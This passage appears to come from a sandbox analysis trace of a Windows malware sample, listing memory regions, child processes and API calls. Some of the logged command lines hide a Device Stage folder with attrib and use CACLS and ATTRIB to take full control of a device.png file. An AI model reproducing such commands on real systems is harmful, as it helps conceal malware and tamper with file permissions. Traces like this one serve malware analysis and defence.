"c:\\windows\\system32\\rpcrt4.dll") Region: id = 18500 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18501 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18502 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18503 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18504 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18505 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18506 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18507 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18508 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" 
filename = "" Region: id = 18509 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 18510 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18511 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 274 os_tid = 0xb0c Process: id = "217" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167e0" os_pid = "0xa40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "214" os_parent_pid = "0xb74" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18512 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18513 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18514 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18515 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000090000" filename = "" Region: id = 18516 start_va = 0x530000 end_va = 0x536fff entry_point = 0x530000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18517 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18518 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18519 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18520 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 18521 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18522 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18523 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18524 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18525 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 18526 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000420000" filename = "" Region: id = 18527 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18528 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18529 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18530 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18531 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18532 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18533 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18534 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18535 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" 
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18536 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18537 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18538 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18539 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 18540 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18541 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 275 os_tid = 0xba4 Process: id = "218" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xa3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" 
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18554 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18555 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18556 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18557 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 18558 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18559 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18560 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18561 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18562 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 18563 
start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18564 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18565 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18566 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18567 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 18568 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 18569 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 18570 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18571 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18572 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18573 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = 
"msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18574 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18575 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18576 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18577 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18578 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 18579 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18580 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 18581 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 18582 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 18583 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename 
= "" Region: id = 18584 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 18585 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 18586 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 18587 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Region: id = 18593 start_va = 0x12e0000 end_va = 0x15aefff entry_point = 0x12e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 276 os_tid = 0xadc [0147.993] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfb54 | out: lpSystemTimeAsFileTime=0x1cfb54*(dwLowDateTime=0x9225cae0, dwHighDateTime=0x1d440a9)) [0147.993] GetCurrentProcessId () returned 0xa3c [0147.993] GetCurrentThreadId () returned 0xadc [0147.993] GetTickCount () returned 0x2df08 [0147.993] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfb4c | out: lpPerformanceCount=0x1cfb4c*=20478245734) returned 1 [0147.994] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0147.994] __set_app_type (_Type=0x1) [0147.994] __p__fmode () returned 0x76b331f4 [0147.994] __p__commode () returned 0x76b331fc [0147.994] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0147.994] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0147.994] GetCurrentThreadId () returned 0xadc [0147.994] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xadc) returned 0x38 [0147.995] 
GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.995] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0147.995] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.995] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0147.995] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfae4 | out: phkResult=0x1cfae4*=0x0) returned 0x2 [0147.995] VirtualQuery (in: lpAddress=0x1cfb1b, lpBuffer=0x1cfab4, dwLength=0x1c | out: lpBuffer=0x1cfab4*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.995] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfab4, dwLength=0x1c | out: lpBuffer=0x1cfab4*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0147.995] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfab4, dwLength=0x1c | out: lpBuffer=0x1cfab4*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0147.995] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfab4, dwLength=0x1c | out: lpBuffer=0x1cfab4*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.995] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfab4, dwLength=0x1c | out: lpBuffer=0x1cfab4*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0147.995] GetConsoleOutputCP () returned 0x1b5 [0147.995] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.995] 
SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0147.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.995] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0147.996] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.996] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.996] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.996] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.996] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.996] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.996] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.996] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0147.996] GetEnvironmentStringsW () returned 0x290368* [0147.997] FreeEnvironmentStringsW (penv=0x290368) returned 1 [0147.997] GetEnvironmentStringsW () returned 0x290368* [0147.997] FreeEnvironmentStringsW (penv=0x290368) returned 1 [0147.997] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cea54 | out: phkResult=0x1cea54*=0x40) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x0, lpData=0x1cea60*=0x18, lpcbData=0x1cea58*=0x1000) returned 0x2 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x1, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x0, lpData=0x1cea60*=0x1, lpcbData=0x1cea58*=0x1000) returned 0x2 [0147.997] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x0, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x40, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x40, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x0, lpData=0x1cea60*=0x40, lpcbData=0x1cea58*=0x1000) returned 0x2 [0147.997] RegCloseKey (hKey=0x40) returned 0x0 [0147.997] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cea54 | out: phkResult=0x1cea54*=0x40) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x0, lpData=0x1cea60*=0x40, lpcbData=0x1cea58*=0x1000) returned 0x2 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x1, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x0, lpData=0x1cea60*=0x1, lpcbData=0x1cea58*=0x1000) returned 0x2 [0147.998] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cea5c, 
lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x0, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.998] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x9, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.998] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x4, lpData=0x1cea60*=0x9, lpcbData=0x1cea58*=0x4) returned 0x0 [0147.998] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cea5c, lpData=0x1cea60, lpcbData=0x1cea58*=0x1000 | out: lpType=0x1cea5c*=0x0, lpData=0x1cea60*=0x9, lpcbData=0x1cea58*=0x1000) returned 0x2 [0147.998] RegCloseKey (hKey=0x40) returned 0x0 [0147.998] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886376 [0147.998] srand (_Seed=0x5b886376) [0147.998] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"" [0147.998] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"" [0147.998] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.998] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x291ac8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: 
"c:\\windows\\system32\\cmd.exe")) returned 0x1b [0147.998] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.999] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.999] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.999] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0147.999] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0147.999] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0147.999] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0147.999] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0147.999] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0147.999] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0147.999] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0147.999] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0147.999] GetEnvironmentStringsW () returned 0x2924b8* [0147.999] FreeEnvironmentStringsW (penv=0x2924b8) returned 1 [0147.999] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.999] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.999] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0147.999] _wcsicmp (_String1="KEYS", 